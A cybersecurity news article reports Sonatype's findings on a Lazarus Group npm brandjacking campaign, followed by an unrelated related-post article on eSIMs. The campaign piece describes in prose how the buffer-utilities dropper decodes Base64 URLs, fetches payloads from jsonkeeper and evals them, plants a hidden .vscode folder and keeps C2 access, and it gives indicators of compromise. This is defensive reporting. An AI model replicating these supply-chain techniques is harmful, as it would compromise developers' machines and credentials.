Lazarus Group Uses npm Brandjacking Campaign to Target Developers

Lazarus Group Uses npm Brandjacking Campaign to Target Developers

North Korean Lazarus Group targets npm developers with brandjacking packages that mimic trusted tools, drop malware and put credentials at risk.

A new npm campaign linked to North Korea’s Lazarus Group shows how attackers are using familiar-looking package names to gain access to developers’ systems and software build environments.

Sonatype Security Research said it is tracking dozens of malicious npm packages connected to the campaign, including some that reached up to 500 weekly downloads. The packages were designed to look related to trusted JavaScript projects and tools, increasing the chance that developers would install them during normal work.

More Than npm Typosquatting

Usually, hackers exploit techniques like typosquatting in such attacks; however, in this case, Sonatype found packages using brandjacking methods such as suffix additions, embedded project names, and version mimicry. Some of the examples spotted by researchers included names built around well known projects such as Buffer, Chai, React, Express, JWT, and Webpack.

That naming strategy is more likely to work in favor of attackers because npm is full of small helper libraries, wrappers, and plugins. A package called buffer-utilities, for example, can appear to be a reasonable companion to the widely used buffer package, even if it has no legitimate connection to the project.

Sonatype’s analysis of buffer-utilities found that the package included copied code from the real buffer library, but also worked as a malicious dropper. Once installed, it decoded Base64 encoded URLs, fetched remote content from www.jsonkeeper.com , and executed the retrieved code using eval().

Researchers said that the pattern appeared in other packages linked to the same Lazarus activity. The use of www.jsonkeeper.com is also notable because Sonatype has previously observed Lazarus using the service to host payloads.

After the first stage runs, the malware can install a Node.js backdoor and downloader. That payload collects basic system details, including the hostname, username, operating system, home directory, and process arguments. It then contacts the command and control infrastructure to receive further instructions.

The malware can also create a hidden .vscode directory in the user’s home folder, download more files, and launch attacker controlled JavaScript as a detached background process. Sonatype said the package can fetch a third stage payload called f.js along with a package.json file, then run npm install --silent before starting the payload.

That behavior gives the attacker a way to maintain access and refresh malicious files over time. Sonatype also reported an update mechanism that lets the payload reconnect to command and control servers, check for newer versions, and replace local files.

Lazarus Group Uses npm Brandjacking Campaign to Target Developers
Infograph explaining the campaign (Credit: Hackread.com)

The campaign shows why npm remains attractive to advanced threat actors. Developers often install packages based on name familiarity, project fit, or convenience, especially in JavaScript environments where small dependencies are common.

The Lazarus connection adds weight to the findings. While the group is often associated with financial theft and high profile cyber espionage operations, this activity shows the group’s interest in developer machines, credentials, build systems, and long term access to enterprise environments.

Protect Your Devices

Organizations that installed buffer-utilities version 1.0.0 or packages associated with Sonatype identifier sonatype-2026-003558 should remove them and review affected systems for signs of further compromise. Sonatype warned that removal alone may not be enough if later payloads have already run.

Administrators should also check for network connections to www.jsonkeeper.com, command and control traffic to 45.59.163.198:1244, unexpected .vscode folders in user home directories, unusual Node.js processes, and any unexplained credential access from developer workstations or build systems.

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cybersecurity and tech world. I am also into gaming, reading and investigative journalism.
Leave a Reply

Your email address will not be published. Required fields are marked *

Related Posts
Why eSIMs Are Replacing Traditional SIM Cards

Why eSIMs Are Replacing Traditional SIM Cards

From SIM swap protection to remote provisioning, eSIMs are quickly replacing physical SIM cards. Here’s why the shift matters for security and convenience.

The physical SIM card is becoming less important with every new phone release. For years, that tiny plastic card was the key to getting a device connected. Now, eSIM technology is giving users a simpler way to activate mobile service, switch plans, and protect their number. Industry forecasts expect eSIMs to make up most smartphone connections by 2030, which shows how quickly mobile networks and device makers are moving in this direction.

Resistance to SIM Swap Attacks

Physical SIM cards have long been a weak point in SIM swap scams. In a typical case, a scammer convinces a carrier representative to move a victim’s phone number to a SIM card they control. Once that happens, the scammer can receive calls, texts, and SMS based two factor codes meant for the real owner.

The FBI’s 2025 Internet Crime Report (FBI) recorded 971 SIM swap complaints, with reported losses of $17.4 million. Consumer advocates describe these scams as especially damaging because many victims only realize what has happened after their phone suddenly loses service or their number is activated on another device. eSIMs do not remove the risk completely, but they reduce some of the openings scammers use, including stolen physical cards and in-person SIM handoffs.

Instant Remote Provisioning

With a physical SIM, getting connected usually means inserting a card into the phone. With an eSIM, the setup happens digitally. A user can scan a QR code, use a carrier app, or activate a plan during device setup. The carrier profile is then added to the phone over the air using eUICC (Embedded Universal Integrated Circuit Card).

That small change makes a big difference. A new plan can be activated in minutes without waiting for a card to arrive in the mail or visiting a carrier store. For businesses, the benefit is even clearer. A company can set up phones, tablets, trackers, or connected equipment without sending staff to handle plastic SIM cards one by one.

Multiple Profiles on One Device

Many smartphones can store several eSIM profiles, although only one or two may be active at the same time. That means one phone can hold a personal number, a work number, and a travel data plan without swapping cards.

This is useful for privacy and travel as well. A user can keep work and personal lines separate, or install a short-term data plan before leaving for another country. Saily eSIM, a travel eSIM service from Nord Security, describes this as an app-based setup that lets users add data plans for different destinations on the same device. If the phone is lost or stolen, the user can contact the carriers and have the eSIM lines deactivated remotely.

Tamper-Resistant Hardware and Protected Credentials

A physical SIM card can be removed from a tray. An eSIM is built into the device, so it cannot be taken out, misplaced, or replaced with another card. That alone makes it harder for someone to interfere with the mobile connection by handling the SIM directly.

The credentials linked to the mobile account are stored inside protected hardware on the device. The eSIM still performs the same basic role as a normal SIM, but without exposing a removable card. For everyday users, the security benefit happens in the background. They activate the plan once, then use the phone as usual.

Why eSIMs Are Replacing Traditional SIM Cards

Phones, Tablets, and Wearables Are Moving to eSIM

Major device makers have been adding eSIM support for years. Apple has already sold eSIM-only iPhone models in several markets, and Google Pixel phones have supported eSIM for a long time. Many smartwatches and cellular tablets also use eSIM because their small designs leave little room for a traditional SIM tray.

This direction makes sense for manufacturers. Removing the SIM tray can free up internal space, improve device sealing, and simplify activation. It also gives carriers and users more flexibility when plans need to be added, changed, or removed.

Scalability for IoT and Enterprise Fleets

eSIM technology is also becoming important for connected devices outside the smartphone market. Cars, sensors, industrial machines, payment terminals, and trackers often need mobile service from the moment they leave the factory. They may also need to change networks later, especially when used in different countries.

In 2023, the GSMA released SGP.32, a standard designed to help companies manage eSIMs in IoT devices remotely. For businesses running many connected devices, this can cut down on manual setup, shipping delays, and service interruptions. A physical SIM can work for one device, but it becomes harder to manage when a company has thousands of them in the field.

What This Means for Everyday Users and Travelers

For most people, the move to eSIM will feel simple. Buy a phone, scan a QR code, or follow the carrier setup steps, and the device is connected. The biggest change is what disappears from the process: fewer store visits, fewer tiny cards to handle, and less waiting.

Travelers may notice the benefit even more. An eSIM can be installed before a trip and activated after landing, giving access to local, regional, or global data without searching for a SIM card at the airport. It also removes the risk of losing a small card while moving between countries.

Traditional SIM cards are not gone yet, but their role is shrinking. eSIMs give users faster setup, easier travel options, cleaner device design, and better protection against some common SIM-related attacks. For phones, wearables, tablets, and connected devices, the direction is already clear.

(Photo by Opal Pierce on Unsplash)

Leave a Reply

Your email address will not be published. Required fields are marked *